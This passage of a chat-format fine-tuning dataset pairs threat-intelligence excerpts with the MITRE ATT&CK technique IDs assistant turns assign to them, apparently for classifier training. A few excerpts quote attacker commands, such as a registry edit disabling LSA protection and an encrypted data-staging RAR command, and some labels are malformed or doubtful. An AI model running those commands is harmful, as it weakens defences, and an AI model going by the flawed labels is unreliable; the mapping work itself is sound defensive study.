}, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to capture webcam video." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Adversaries can direct BACKSPACE to upload files to the C2 Server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used Python-based implants to interact with compromised hosts." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Each message contains an attachment that loads the payload – part of Cobalt Strike software – to the computer's operating memory. In order to make this download possible, attackers have tried several different formats of attachments and emails, as their primary task is to bypass mail filters, protection measures, and the company's security policy. 3 Example of a message with an executable attachment (.exe) The archive is password-protected in order to bypass anti-virus scans, security systems, and mail filters. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attachedTemplate.dotm xxx 11/15/18 05:35 11/15/18 05:35 109.248.148[.]42 Table 2 Remote templates downloaded by Dear Joohn delivery documents As seen in Table 1, the delivery documents accessed their respective remote templates from four C2 servers at the following IP addresses: 185.203.118[.]198 145.249.105[.]165 188.241.58[.]170  109.248.148[.]42 These initial C2 IP addresses not only hosted the remote templates that subsequently load the first-stage Zebrocy or Cannon payloads, but the IP addresses also hosted the C2 server for the first-stage payloads themselves" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has disabled LSA protection on compromised hosts using `\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`." }, { "role": "assistant", "content": "T1562 - Impair Defenses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP over SSL to communicate commands with the control server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom UDP protocol to communicate." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects local files and information from the victim’s local machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear can hook the \"ZwOpenProcess\" and \"GetExtendedTcpTable\" APIs called by the process of a security product to hide PIDs and TCP records from detection." }, { "role": "assistant", "content": "T1562.006 - Impair Defenses: Indicator Blocking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This behavior is detailed later in the blog under \"Malware Functionality\". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the \"Recovery of User Credentials\" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the \"Recovery of User Credentials\" section above" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors used the following command following exploitation of a machine with malware to display network connections: netstat -ano >> %temp%\\download" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a keylogger to capture keystrokes it then sends back to the server after it is stopped." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "iKitten saves itself with a leading \".\" so that it's hidden from users by default." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITSAdmin can be used to create BITS Jobs to launch a malicious process." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker scans for other machines to infect." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot has tricked recipients into enabling malicious macros by getting victims to click \"enable content\" in email attachments." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Efforts to decrease operational visibility included placing tool and output files within temporary file system mount points that were stored in volatile memory. Additionally, UNC1945 used built-in utilities and public tools to modify timestamps and selectively manipulate Unix log files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT adds a shortcut file to the startup folder for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mongall can upload files and information from a compromised host to its C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RawPOS installs itself as a service to maintain persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations" }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TClient is injected into dllhost.exe Malware Analysis  wab32res.dll (FakeRun loader) loads TClient" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 uses steganography to send images to users that are embedded with shellcode." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive: YYYY-MM-DD hh:mm:ss quser YYYY-MM-DD hh:mm:ss C:\\windows\\temp\\svchost.exe a -m5 -v2000m -hp{password} -inul -r \"{destination_file.rar}\" \"{multiple user directories linked to the victim's projects}\" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst The threat actors typically rename the encrypted RAR archives" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon uses HTTP for communication to the control servers." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turian can establish persistence by adding Registry Run keys." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CSPY Downloader can download additional tools to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The worm also includes code to scan for open Docker API’s using masscan, then spin up docker images and install itself" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can execute itself as a service." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ajax Security Team has used various social media channels to spearphish victims." }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes C2 traffic with base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Read a specified file’s contents and send the data to the control server Write data sent by the control server to an existing file Mark a file to be deleted on reboot Marking a file for deletion on reboot" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SharpStage has the ability to download and execute additional payloads via a DropBox API." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From those servers the threat actor could use a web shell to retrieve the encrypted archives: copy \\\\{FILE PATH}\\c$\\programdata\\*.tmp \\\\{FILE PATH}\\ServiceDesk\\custom\\style After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In at least one instance of EnvyScout delivery, we observed further enumeration of the executing browser’s environment, wherein the user-agent was used to determine whether a Windows machine received an ISO payload. If the visitor arrived via iOS, they were redirected to external infrastructure" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PyDCrypt has attempted to execute with PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTPS for command and control." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of enumerating application windows." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can use PowerShell commands to disable the network adapters on a victim machines." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by ." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chrommme can decrypt its encrypted internal code." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link', 'T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of injecting code into the APC queue of a created process as part of an \"Early Bird injection.\"" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca used the command `move [file path] c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoudMiner used a batch script to run the Linux virtual machine as a service." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers information about the Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has the ability to identify the IP of the infected host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is used to enumerate and dump information from Microsoft SharePoint." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each of these weaponized documents used the same tactic for their attacks. Upon opening the document, it leveraged the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document as seen in Figure 4" }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BISCUIT can capture keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It uses the string 5cd8f17f4086744065eb0992a09e05a2 as its mutex as well as its registry hive in the affected machine. It uses the value tcpClient_0 as its HTTP server, where it will receive all stolen information from the infected machine. However, since the value was set to null, all stolen information will be sent to the same C&C server" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor – but that's a totally different threat with different functionality. When loaded, its exported function DllEntryPoint() will be called automatically. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it’s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive" }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the “attachedTemplate” technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42’s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus’ use of the open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near-future" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT has included a base64 encoded executable." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key." }, { "role": "assistant", "content": "T1546.010 - Event Triggered Execution: AppInit DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader." }, { "role": "assistant", "content": "T1027.003 - Steganography', 'T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, 